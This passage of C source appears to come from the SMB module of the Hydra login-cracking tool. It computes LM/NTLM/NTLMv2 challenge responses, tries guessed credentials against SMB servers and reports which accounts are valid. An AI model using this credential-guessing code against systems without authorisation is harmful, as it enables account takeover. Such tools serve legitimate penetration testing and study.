TIME structure:\n Little-endian, 64-bit signed value representing the number of tenths of a\n microsecond since January 1, 1601.\n */\n struct timespec ts;\n unsigned long long nt;\n\n ts.tv_sec = (time_t)time(NULL);\n ts.tv_nsec = 0;\n\n if (ts.tv_sec == 0)\n nt = 0;\n else if (ts.tv_sec == TIME_T_MAX)\n nt = 0x7fffffffffffffffLL;\n else if (ts.tv_sec == (time_t)-1)\n nt = (unsigned long)-1;\n else {\n nt = ts.tv_sec;\n nt += TIME_FIXUP_CONSTANT_INT;\n nt *= 1000 * 1000 * 10; /* nt is now in the 100ns units */\n }\n\n SIVAL(ntlmv2_response + 24, 0, nt & 0xFFFFFFFF);\n SIVAL(ntlmv2_response + 24, 4, nt >> 32);\n /* End time calculation */\n\n /* Set client challenge - using a non-random value in this case. */\n memcpy(ntlmv2_response + 32, client_challenge, 8); /* Client Nonce */\n memset(ntlmv2_response + 40, 0, 4); /* Unknown */\n\n /* Target Information Block */\n /*\n 0x0100 Server name\n 0x0200 Domain name\n 0x0300 Fully-qualified DNS host name\n 0x0400 DNS domain name\n\n TODO: Need to rework negotiation code to correctly extract target\n information\n */\n\n memset(ntlmv2_response + 44, 0x02, 1); /* Type: Domain */\n memset(ntlmv2_response + 45, 0x00, 1);\n memset(ntlmv2_response + 46, iTargetLen, 1); /* Length */\n memset(ntlmv2_response + 47, 0x00, 1);\n\n /* Name of domain or workgroup */\n for (i = 0; i < strlen((char *)workgroup); i++)\n ntlmv2_response[48 + i * 2] = (unsigned char)workgroup[i];\n\n memset(ntlmv2_response + 48 + iTargetLen, 0, 4); /* End-of-list */\n\n /* --- HMAC #2 Caculations --- */\n\n /*\n The challenge from the Type 2 message is concatenated with the blob. The\n HMAC-MD5 message authentication code algorithm is applied to this value\n using the 16-byte NTLMv2 hash (calculated above) as the key. This results\n in a 16-byte output value.\n */\n\n hmac_md5_init_limK_to_64(kr_buf, 16, &ctx);\n hmac_md5_update(challenge, 8, &ctx);\n hmac_md5_update(ntlmv2_response + 16, 48 - 16 + iTargetLen + 4, &ctx);\n hmac_md5_final(ntlmv2_response, &ctx);\n\n *iByteCount = 48 + iTargetLen + 4;\n if ((*NTLMv2hash = malloc(*iByteCount)) == NULL)\n return -1;\n memset(*NTLMv2hash, 0, *iByteCount);\n memcpy(*NTLMv2hash, ntlmv2_response, *iByteCount);\n\n return 0;\n}\n\n/*\n HashNTLM\n Function: Create a NTLM hash from the challenge\n Variables:\n ntlmhash = the hash created from this function\n pass = users password\n challenge = the challenge recieved from the server\n*/\nint32_t HashNTLM(unsigned char **ntlmhash, unsigned char *pass, unsigned char *challenge, char *miscptr) {\n int32_t ret;\n unsigned char hash[16]; /* MD4_SIGNATURE_SIZE = 16 */\n unsigned char p21[21];\n unsigned char ntlm_response[24];\n\n ret = MakeNTLM((unsigned char *)&hash, (unsigned char *)pass);\n if (ret == -1)\n hydra_child_exit(0);\n\n memset(p21, '\\0', 21);\n memcpy(p21, hash, 16);\n\n DesEncrypt(challenge, p21 + 0, ntlm_response + 0);\n DesEncrypt(challenge, p21 + 7, ntlm_response + 8);\n DesEncrypt(challenge, p21 + 14, ntlm_response + 16);\n\n memcpy(*ntlmhash, ntlm_response, 24);\n\n return 0;\n}\n\n/*\n NBS Session Request\n Function: Request a new session from the server\n Returns: TRUE on success else FALSE.\n*/\nint32_t NBSSessionRequest(int32_t s) {\n char nb_name[32]; /* netbiosname */\n char nb_local[32]; /* netbios localredirector */\n unsigned char rqbuf[7] = {0x81, 0x00, 0x00, 0x44, 0x20, 0x00, 0x20};\n char *buf;\n unsigned char rbuf[400];\n int32_t k;\n\n /* if we are running in native mode (aka port 445) don't do netbios */\n if (protoFlag == WIN2000_NATIVEMODE)\n return 0;\n\n /* convert computer name to netbios name */\n memset(nb_name, 0, 32);\n memset(nb_local, 0, 32);\n memcpy(nb_name, \"CKFDENECFDEFFCFGEFFCCACACACACACA\", 32); /* *SMBSERVER */\n memcpy(nb_local, \"EIFJEEFCEBCACACACACACACACACACACA\", 32); /* HYDRA */\n\n if ((buf = (char *)malloc(100)) == NULL)\n return -1;\n memset(buf, 0, 100);\n memcpy(buf, (char *)rqbuf, 5);\n memcpy(buf + 5, nb_name, 32);\n memcpy(buf + 37, (char *)rqbuf + 5, 2);\n memcpy(buf + 39, nb_local, 32);\n memcpy(buf + 71, (char *)rqbuf + 5, 1);\n\n hydra_send(s, buf, 72, 0);\n free(buf);\n\n memset(rbuf, 0, 400);\n k = hydra_recv(s, (char *)rbuf, sizeof(rbuf));\n\n if (k > 0 && (rbuf[0] == 0x82))\n return 0; /* success */\n else\n return -1; /* failed */\n}\n\n/*\n SMBNegProt\n Function: Negotiate protocol with server ...\n Actually a pseudo negotiation since the whole\n program counts on NTLM support :)\n\n The challenge is retrieved from the answer\n No error checking is performed i.e cross your fingers....\n*/\nint32_t SMBNegProt(int32_t s) {\n unsigned char buf[] = {\n 0x00, 0x00, 0x00, 0xbe, 0xff, 0x53, 0x4d, 0x42, 0x72, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x7d, 0x00, 0x00, 0x01, 0x00, 0x00, 0x9b, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4d,\n 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x20, 0x31, 0x2e, 0x30, 0x33, 0x00, 0x02, 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x20, 0x33, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58,\n 0x30, 0x30, 0x32, 0x00, 0x02, 0x44, 0x4f, 0x53, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x53, 0x61, 0x6d, 0x62, 0x61, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00\n\n /*\n 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46,\n 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52,\n 0x4b, 0x53, 0x20, 0x31, 0x2e, 0x30, 0x33, 0x00,\n 0x02, 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f,\n 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x53, 0x20, 0x33, 0x2e, 0x30, 0x00,\n 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31,\n 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e,\n 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x53,\n 0x61, 0x6d, 0x62, 0x61, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20,\n 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20,\n 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00\n */\n };\n\n unsigned char rbuf[400];\n unsigned char sess_key[2];\n unsigned char userid[2] = {0xCD, 0xEF};\n int32_t i = 0, j = 0, k;\n int32_t iLength = 194;\n int32_t iResponseOffset = 73;\n\n memset((char *)rbuf, 0, 400);\n\n /* set session key */\n sess_key[1] = getpid() / 100;\n sess_key[0] = getpid() - (100 * sess_key[1]);\n memcpy(buf + 30, sess_key, 2);\n memcpy(buf + 32, userid, 2);\n\n if (smb_auth_mechanism == AUTH_LM) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Setting Negotiate Protocol Response for LM.\\n\");\n buf[3] = 0xA3; // Set message length\n buf[37] = 0x80; // Set byte count for dialects\n iLength = 167;\n iResponseOffset = 65;\n }\n\n hydra_send(s, (char *)buf, iLength, 0);\n k = hydra_recv(s, (char *)rbuf, sizeof(rbuf));\n if (k == 0)\n return 3;\n\n /* retrieve the security mode */\n /*\n [0] Mode: (0) ? (1) USER security\n mode [1] Password: (0) PLAINTEXT password (1) ENCRYPTED\n password. Use challenge/response [2] Signatures: (0) Security signatures\n NOT enabled (1) ENABLED [3] Sig Req: (0) Security signatures NOT\n required (1) REQUIRED\n\n SAMBA: 0x01 (default)\n WinXP: 0x0F (default)\n WinXP: 0x07 (Windows 2003 / DC)\n */\n switch (rbuf[39]) {\n case 0x01:\n // real plaintext should be used with LM auth\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server requested PLAINTEXT password.\\n\");\n security_mode = PLAINTEXT;\n\n if (hashFlag == 1) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server requested PLAINTEXT password. HASH \"\n \"password mode not supported for this configuration.\\n\");\n return 3;\n }\n if (hashFlag == 2) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server requested PLAINTEXT password. MACHINE \"\n \"password mode not supported for this configuration.\\n\");\n return 3;\n }\n break;\n case 0x03:\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server requested ENCRYPTED password \"\n \"without security signatures.\\n\");\n security_mode = ENCRYPTED;\n break;\n case 0x07:\n case 0x0F:\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server requested ENCRYPTED password.\\n\");\n security_mode = ENCRYPTED;\n break;\n default:\n if (verbose)\n hydra_report(stderr,\n \"[VERBOSE] Unknown security mode request: %2.2X. Proceeding \"\n \"using ENCRYPTED password mode.\\n\",\n rbuf[39]);\n security_mode = ENCRYPTED;\n break;\n }\n\n /* Retrieve the challenge */\n memcpy(challenge, (char *)rbuf + iResponseOffset, sizeof(challenge));\n\n /* Find the primary domain/workgroup name */\n memset(workgroup, 0, 16);\n memset(machine_name, 0, 16);\n\n // seems using LM only the domain is returned not the server\n // and the domain is not padded with null chars\n if (smb_auth_mechanism == AUTH_LM) {\n while ((rbuf[iResponseOffset + 8 + i] != 0) && (i < 16)) {\n workgroup[i] = rbuf[iResponseOffset + 8 + i];\n i++;\n }\n } else {\n while ((rbuf[iResponseOffset + 8 + i * 2] != 0) && (i < 16)) {\n workgroup[i] = rbuf[iResponseOffset + 8 + i * 2];\n i++;\n }\n\n while ((rbuf[iResponseOffset + 8 + (i + j + 1) * 2] != 0) && (j < 16)) {\n machine_name[j] = rbuf[iResponseOffset + 8 + (i + j + 1) * 2];\n j++;\n }\n }\n\n if (verbose) {\n hydra_report(stderr, \"[VERBOSE] Server machine name: %s\\n\", machine_name);\n hydra_report(stderr, \"[VERBOSE] Server primary domain: %s\\n\", workgroup);\n }\n // success\n return 2;\n}\n\n/*\n SMBSessionSetup\n Function: Send username + response to the challenge from\n the server.\n Returns: TRUE on success else FALSE.\n*/\nunsigned long SMBSessionSetup(int32_t s, char *szLogin, char *szPassword, char *miscptr) {\n unsigned char buf[512];\n unsigned char *LMv2hash = NULL;\n unsigned char *NTLMv2hash = NULL;\n unsigned char *NTLMhash = NULL;\n unsigned char *LMhash = NULL;\n // unsigned char unicodeLogin[32 * 2];\n int32_t j;\n char bufReceive[512];\n int32_t nReceiveBufferSize = 0;\n int32_t ret;\n int32_t iByteCount = 0, iOffset = 0;\n\n if (accntFlag == 0) {\n strcpy((char *)workgroup, \"localhost\");\n\n } else if (accntFlag == 2) {\n memset(workgroup, 0, 16);\n }\n // domain flag is not needed here, it will be auto set,\n // below it's domain specified on cmd line\n else if (accntFlag == 4) {\n strncpy((char *)workgroup, (char *)domain, 16);\n }\n\n /* NetBIOS Session Service */\n unsigned char szNBSS[4] = {\n 0x00, /* Message Type: Session Message */\n 0x00, 0x00, 0x85 /* Length -- MUST SET */\n };\n\n /* SMB Header */\n unsigned char szSMB[32] = {\n 0xff,\n 0x53,\n 0x4d,\n 0x42, /* Server Component */\n 0x73, /* SMB Command: Session Setup AndX */\n 0x00,\n 0x00,\n 0x00,\n 0x00, /* NT Status: STATUS_SUCCESS */\n 0x08, /* Flags */\n 0x01,\n 0xc0,\n /* Flags2 */ /* add Unicode */\n 0x00,\n 0x00, /* Process ID High */\n 0x00,\n 0x00,\n 0x00,\n 0x00,\n 0x00,\n 0x00,\n 0x00,\n 0x00, /* Signature */\n 0x00,\n 0x00, /* Reserved */\n 0x00,\n 0x00, /* Tree ID */\n 0x13,\n 0x37, /* Process ID */\n 0x00,\n 0x00, /* User ID */\n 0x01,\n 0x00 /* Multiplx ID */\n };\n\n memset(buf, 0, 512);\n memcpy(buf, szNBSS, 4);\n memcpy(buf + 4, szSMB, 32);\n\n if (security_mode == ENCRYPTED) {\n /* Session Setup AndX Request */\n if (smb_auth_mechanism == AUTH_LM) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting LM password authentication.\\n\");\n\n unsigned char szSessionRequest[23] = {\n 0x0a, /* Word Count */\n 0xff, /* AndXCommand: No further commands */\n 0x00, /* Reserved */\n 0x00, 0x00, /* AndXOffset */\n 0xff, 0xff, /* Max Buffer */\n 0x02, 0x00, /* Max Mpx Count */\n 0x3c, 0x7d, /* VC Number */\n 0x00, 0x00, 0x00, 0x00, /* Session Key */\n 0x18, 0x00, /* LAN Manager Password Hash Length */\n 0x00, 0x00, 0x00, 0x00, /* Reserved */\n 0x49, 0x00 /* Byte Count -- MUST SET */\n };\n\n iOffset = 59; /* szNBSS + szSMB + szSessionRequest */\n iByteCount = 24; /* Start with length of LM hash */\n\n /* Set Session Setup AndX Request header information */\n memcpy(buf + 36, szSessionRequest, 23);\n\n /* Calculate and set LAN Manager password hash */\n if ((LMhash = (unsigned char *)malloc(24)) == NULL)\n return -1;\n memset(LMhash, 0, 24);\n\n ret = HashLM(&LMhash, (unsigned char *)szPassword, (unsigned char *)challenge);\n if (ret == -1) {\n free(LMhash);\n return -1;\n }\n\n memcpy(buf + iOffset, LMhash, 24);\n free(LMhash);\n\n } else if (smb_auth_mechanism == AUTH_NTLM) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting NTLM password authentication.\\n\");\n\n unsigned char szSessionRequest[29] = {\n 0x0d, /* Word Count */\n 0xff, /* AndXCommand: No further commands */\n 0x00, /* Reserved */\n 0x00,\n 0x00, /* AndXOffset */\n 0xff,\n 0xff, /* Max Buffer */\n 0x02,\n 0x00, /* Max Mpx Count */\n 0x3c,\n 0x7d, /* VC Number */\n 0x00,\n 0x00,\n 0x00,\n 0x00, /* Session Key */\n 0x18,\n 0x00, /* LAN Manager Password Hash Length */\n 0x18,\n 0x00, /* NT LAN Manager Password Hash Length */\n 0x00,\n 0x00,\n 0x00,\n 0x00, /* Reserved */\n 0x5c,\n 0x00,\n 0x00,\n 0x00,\n /* Capabilities */ /* Add Unicode */\n 0x49,\n 0x00 /* Byte Count -- MUST SET */\n };\n\n iOffset = 65; /* szNBSS + szSMB + szSessionRequest */\n iByteCount = 48; /* Start with length of NTLM and LM hashes */\n\n /* Set Session Setup AndX Request header information */\n memcpy(buf + 36, szSessionRequest, 29);\n\n /* Calculate and set NTLM password hash */\n if ((NTLMhash = (unsigned char *)malloc(24)) == NULL)\n return -1;\n memset(NTLMhash, 0, 24);\n\n /* We don't need to actually calculated a LM hash for this mode, only NTLM\n */\n ret = HashNTLM(&NTLMhash, (unsigned char *)szPassword, (unsigned char *)challenge, miscptr);\n if (ret == -1)\n return -1;\n\n memcpy(buf + iOffset + 24, NTLMhash, 24); /* Skip space for LM hash */\n free(NTLMhash);\n } else if (smb_auth_mechanism == AUTH_LMv2) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting LMv2 password authentication.\\n\");\n\n unsigned char szSessionRequest[29] = {\n 0x0d, /* Word Count */\n 0xff, /* AndXCommand: No further commands */\n 0x00, /* Reserved */\n 0x00, 0x00, /* AndXOffset */\n 0xff, 0xff, /* Max Buffer */\n 0x02, 0x00, /* Max Mpx Count */\n 0x3c, 0x7d, /* VC Number */\n 0x00, 0x00, 0x00, 0x00, /* Session Key */\n 0x18, 0x00, /* LAN Manager Password Hash Length */\n 0x00, 0x00, /* NT LAN Manager Password Hash Length */\n 0x00, 0x00, 0x00, 0x00, /* Reserved */\n 0x50, 0x00, 0x00, 0x00, /* Capabilities */\n 0x49, 0x00 /* Byte Count -- MUST SET */\n };\n\n iOffset = 65; /* szNBSS + szSMB + szSessionRequest */\n iByteCount = 24; /* Start with length of LMv2 response */\n\n /* Set Session Setup AndX Request header information */\n memcpy(buf + 36, szSessionRequest, 29);\n\n /* Calculate and set LMv2 response hash */\n if ((LMv2hash = (unsigned char *)malloc(24)) == NULL)\n return -1;\n memset(LMv2hash, 0, 24);\n\n ret = HashLMv2(&LMv2hash, (unsigned char *)szLogin, (unsigned char *)szPassword);\n if (ret == -1) {\n free(LMv2hash);\n return -1;\n }\n\n memcpy(buf + iOffset, LMv2hash, 24);\n free(LMv2hash);\n } else if (smb_auth_mechanism == AUTH_NTLMv2) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting LMv2/NTLMv2 password authentication.\\n\");\n\n unsigned char szSessionRequest[29] = {\n 0x0d, /* Word Count */\n 0xff, /* AndXCommand: No further commands */\n 0x00, /* Reserved */\n 0x00, 0x00, /* AndXOffset */\n 0xff, 0xff, /* Max Buffer */\n 0x02, 0x00, /* Max Mpx Count */\n 0x3c, 0x7d, /* VC Number */\n 0x00, 0x00, 0x00, 0x00, /* Session Key */\n 0x18, 0x00, /* LMv2 Response Hash Length */\n 0x4b, 0x00, /* NTLMv2 Response Hash Length -- MUST SET */\n 0x00, 0x00, 0x00, 0x00, /* Reserved */\n 0x50, 0x00, 0x00, 0x00, /* Capabilities */\n 0x49, 0x00 /* Byte Count -- MUST SET */\n };\n\n iOffset = 65; /* szNBSS + szSMB + szSessionRequest */\n\n /* Set Session Setup AndX Request header information */\n memcpy(buf + 36, szSessionRequest, 29);\n\n /* Calculate and set LMv2 response hash */\n ret = HashLMv2(&LMv2hash, (unsigned char *)szLogin, (unsigned char *)szPassword);\n if (ret == -1)\n return -1;\n\n memcpy(buf + iOffset, LMv2hash, 24);\n free(LMv2hash);\n\n /* Calculate and set NTLMv2 response hash */\n ret = HashNTLMv2(&NTLMv2hash, &iByteCount, (unsigned char *)szLogin, (unsigned char *)szPassword);\n if (ret == -1)\n return -1;\n\n /* Set NTLMv2 Response Length */\n memset(buf + iOffset - 12, iByteCount, 1);\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] HashNTLMv2 response length: %d\\n\", iByteCount);\n\n memcpy(buf + iOffset + 24, NTLMv2hash, iByteCount);\n free(NTLMv2hash);\n\n iByteCount += 24; /* Reflects length of both LMv2 and NTLMv2 responses */\n }\n } else if (security_mode == PLAINTEXT) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting PLAINTEXT password authentication.\\n\");\n\n unsigned char szSessionRequest[23] = {\n 0x0a, /* Word Count */\n 0xff, /* AndXCommand: No further commands */\n 0x00, /* Reserved */\n 0x00, 0x00, /* AndXOffset */\n 0xff, 0xff, /* Max Buffer */\n 0x02, 0x00, /* Max Mpx Count */\n 0x3c, 0x7d, /* VC Number */\n 0x00, 0x00, 0x00, 0x00, /* Session Key */\n 0x00, 0x00, /* Password Length -- MUST SET */\n 0x00, 0x00, 0x00, 0x00, /* Reserved */\n 0x49, 0x00 /* Byte Count -- MUST SET */\n };\n\n iOffset = 59; /* szNBSS + szSMB + szSessionRequest */\n\n /* Set Session Setup AndX Request header information */\n memcpy(buf + 36, szSessionRequest, 23);\n\n /* Calculate and set password length */\n /* Samba appears to append NULL characters equal to the password length plus\n * 2 */\n // iByteCount = 2 * strlen(szPassword) + 2;\n iByteCount = strlen(szPassword) + 1;\n buf[iOffset - 8] = (iByteCount) % 256;\n buf[iOffset - 7] = (iByteCount) / 256;\n\n /* set ANSI password */\n /*\n Depending on the SAMBA server configuration, multiple passwords may be\n successful when dealing with mixed-case values. The SAMBA parameter\n \"password level\" appears to determine how many characters within a\n password are tested by the server both upper and lower case. For example,\n assume a SAMBA account has a password of \"Fred\" and the server is\n configured with \"password level = 2\". Medusa sends the password \"FRED\".\n The SAMBA server will brute-force test this value for us with values\n like: \"FRed\", \"FrEd\", \"FreD\", \"fREd\", \"fReD\", \"frED\", ... The default\n setting is \"password level = 0\". This results in only two attempts to\n being made by the remote server; the password as is and the password in\n all-lower case.\n */\n strncpy((char *)(buf + iOffset), szPassword, 256);\n } else {\n hydra_report(stderr, \"[ERROR] Security_mode was not properly set. This \"\n \"should not happen.\\n\");\n return -1;\n }\n\n /* Set account and workgroup values */\n\n j = UTF8_UTF16LE((unsigned char *)szLogin, strlen(szLogin), buf + iOffset + iByteCount + 1, 2 * strlen(szLogin));\n iByteCount += j + 3; /* NULL pad account name */\n j = UTF8_UTF16LE(workgroup, strlen((char *)workgroup), buf + iOffset + iByteCount, 2 * strlen((char *)workgroup));\n iByteCount += j + 2; // NULL pad workgroup name\n\n /* Set native OS and LAN Manager values */\n\n char *szOSName = \"Unix\";\n j = UTF8_UTF16LE((unsigned char *)szOSName, strlen(szOSName), buf + iOffset + iByteCount, 2 * sizeof(szOSName));\n iByteCount += j + 2; // NULL terminated\n char *szLANMANName = \"Samba\";\n j = UTF8_UTF16LE((unsigned char *)szLANMANName, strlen(szLANMANName), buf + iOffset + iByteCount, 2 * sizeof(szLANMANName));\n iByteCount += j + 2; // NULL terminated\n\n /* Set the header length */\n buf[2] = (iOffset - 4 + iByteCount) / 256;\n buf[3] = (iOffset - 4 + iByteCount) % 256;\n\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Set NBSS header length: %2.2X\\n\", buf[3]);\n\n /* Set data byte count */\n buf[iOffset - 2] = iByteCount;\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Set byte count: %2.2X\\n\", buf[57]);\n\n hydra_send(s, (char *)buf, iOffset + iByteCount, 0);\n\n nReceiveBufferSize = hydra_recv(s, bufReceive, sizeof(bufReceive));\n if (/*bufReceive == NULL ||*/ nReceiveBufferSize == 0)\n return -1;\n\n /* 41 - Action (Guest/Non-Guest Account) */\n /* 9 - NT Status (Error code) */\n return (((bufReceive[41] & 0x01) << 24) | ((bufReceive[11] & 0xFF) << 16) | ((bufReceive[10] & 0xFF) << 8) | (bufReceive[9] & 0xFF));\n}\n\nint32_t start_smb(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n int32_t SMBerr, SMBaction;\n unsigned long SMBSessionRet;\n char ipaddr_str[64];\n char ErrorCode[10];\n\n memset(&ErrorCode, 0, 10);\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n strncpy(ipaddr_str, hydra_address2string(ip), sizeof(ipaddr_str) - 1);\n\n SMBSessionRet = SMBSessionSetup(s, login, pass, miscptr);\n if (SMBSessionRet == -1)\n return 3;\n SMBerr = (unsigned long)SMBSessionRet & 0x00FFFFFF;\n SMBaction = ((unsigned long)SMBSessionRet & 0xFF000000) >> 24;\n\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] SMBSessionRet: %8.8X SMBerr: %4.4X SMBaction: %2.2X\\n\", (uint32_t)SMBSessionRet, SMBerr, SMBaction);\n\n /*\n some error code are available here:\n http://msdn.microsoft.com/en-us/library/ee441884(v=prot.13).aspx\n */\n\n if (SMBerr == 0x000000) { /* success */\n if (SMBaction == 0x01) { /* invalid account - anonymous connection */\n fprintf(stderr,\n \"[%d][smb] Host: %s Account: %s Error: Invalid account \"\n \"(Anonymous success)\\n\",\n port, ipaddr_str, login);\n hydra_completed_pair_skip();\n } else { /* valid account */\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_found();\n }\n } else if ((SMBerr == 0x00000D) && (SMBaction == 0x00)) {\n hydra_report(stderr, \"[ERROR] Invalid parameter status received, either \"\n \"the account or the method used are not valid\\n\");\n hydra_completed_pair_skip();\n } else if (SMBerr == 0x00006E) { /* Valid password, GPO Disabling Remote\n Connections Using NULL Passwords */\n hydra_report(stdout,\n \"[%d][smb] Host: %s Account: %s Valid password, GPO Disabling \"\n \"Remote Connections Using NULL Passwords\\n\",\n port, ipaddr_str, login);\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_found();\n } else if (SMBerr == 0x00015B) { /* Valid password, GPO \"Deny access to this\n computer from the network\" */\n hydra_report(stdout,\n \"[%d][smb] Host: %s Account: %s Valid password, GPO Deny \"\n \"access to this computer from the network\\n\",\n port, ipaddr_str, login);\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_found();\n } else if (SMBerr == 0x000193) { /* Valid password, account expired */\n hydra_report(stdout, \"[%d][smb] Host: %s Account: %s Valid password, account expired\\n\", port, ipaddr_str, login);\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_skip();\n } else if ((SMBerr == 0x000224) || (SMBerr == 0xC20002)) { /* Valid password, password expired */\n hydra_report(stdout,\n \"[%d][smb] Host: %s Account: %s Valid password, password \"\n \"expired and must be changed on next logon\\n\",\n port, ipaddr_str, login);\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_found();\n } else if ((SMBerr == 0x00006F) || (SMBerr == 0xC10002)) { /* Invalid logon hours */\n hydra_report(stdout,\n \"[%d][smb] Host: %s Account: %s Valid password, but logon \"\n \"hours invalid\\n\",\n port, ipaddr_str, login);\n hydra_report_found_host(port, ip, \"smb\", fp);\n hydra_completed_pair_found();\n } else if (SMBerr == 0x050001) { /* AS/400 -- Incorrect password */\n hydra_report(stdout,\n \"[%d][smb] Host: %s Account: %s Error: Incorrect password or \"\n \"account disabled\\n\",\n port, ipaddr_str, login);\n if ((miscptr) && (strstr(miscptr, \"LM\")))\n hydra_report(stderr, \"[INFO] LM dialect may be disabled, try LMV2 instead\\n\");\n hydra_completed_pair_skip();\n } else if (SMBerr == 0x000024) { /* change password on next login [success] */\n hydra_report(stdout, \"[%d][smb] Host: %s Account: %s Information: ACCOUNT_CHANGE_PASSWORD\\n\", port, ipaddr_str, login);\n hydra_completed_pair_found();\n } else if (SMBerr == 0x00006D) { /* STATUS_LOGON_FAILURE */\n hydra_completed_pair();\n } else if (SMBerr == 0x000071) { /* password expired */\n hydra_report(stdout, \"[%d][smb] Host: %s Account: %s Information: PASSWORD EXPIRED\\n\", port, ipaddr_str, login);\n hydra_completed_pair_found();\n } else if ((SMBerr == 0x000072) || (SMBerr == 0xBF0002)) { /* account disabled */ /* BF0002 on w2k */\n if (verbose)\n fprintf(stderr, \"[%d][smb] Host: %s Account: %s Error: ACCOUNT_DISABLED\\n\", port, ipaddr_str, login);\n hydra_completed_pair_skip();\n } else if (SMBerr == 0x000034 || SMBerr == 0x000234) { /* account locked out */\n if (verbose)\n fprintf(stderr, \"[%d][smb] Host: %s Account: %s Error: ACCOUNT_LOCKED\\n\", port, ipaddr_str, login);\n hydra_completed_pair_skip();\n } else if (SMBerr == 0x00008D) { /* ummm... broken client-domain membership */\n if (verbose)\n fprintf(stderr,\n \"[%d][smb] Host: %s Account: %s Error: \"\n \"NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE\\n\",\n port, ipaddr_str, login);\n hydra_completed_pair();\n } else { /* failed */\n if (verbose)\n fprintf(stderr, \"[%d][smb] Host: %s Account: %s Unknown Error: %6.6X\\n\", port, ipaddr_str, login, SMBerr);\n hydra_completed_pair();\n }\n\n hydra_disconnect(s);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_smb(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n // default is both (local and domain) checks and normal passwd\n accntFlag = 2; // BOTH\n hashFlag = 0; // PASS\n smb_auth_mechanism = AUTH_NTLM;\n\n if (miscptr) {\n // check group\n strupper(miscptr);\n if (strstr(miscptr, \"OTHER_DOMAIN:\") != NULL) {\n char *tmpdom;\n int32_t err = 0;\n\n accntFlag = 4; // OTHER DOMAIN\n tmpdom = strstr(miscptr, \"OTHER_DOMAIN:\");\n tmpdom = tmpdom + strlen(\"OTHER_DOMAIN:\");\n\n if (tmpdom) {\n // split the string after the domain if there are other values\n strtok(tmpdom, \" \");\n if (tmpdom) {\n strncpy((char *)domain, (char *)tmpdom, sizeof(domain) - 1);\n domain[sizeof(domain) - 1] = 0;\n } else {\n err = 1;\n }\n } else {\n err = 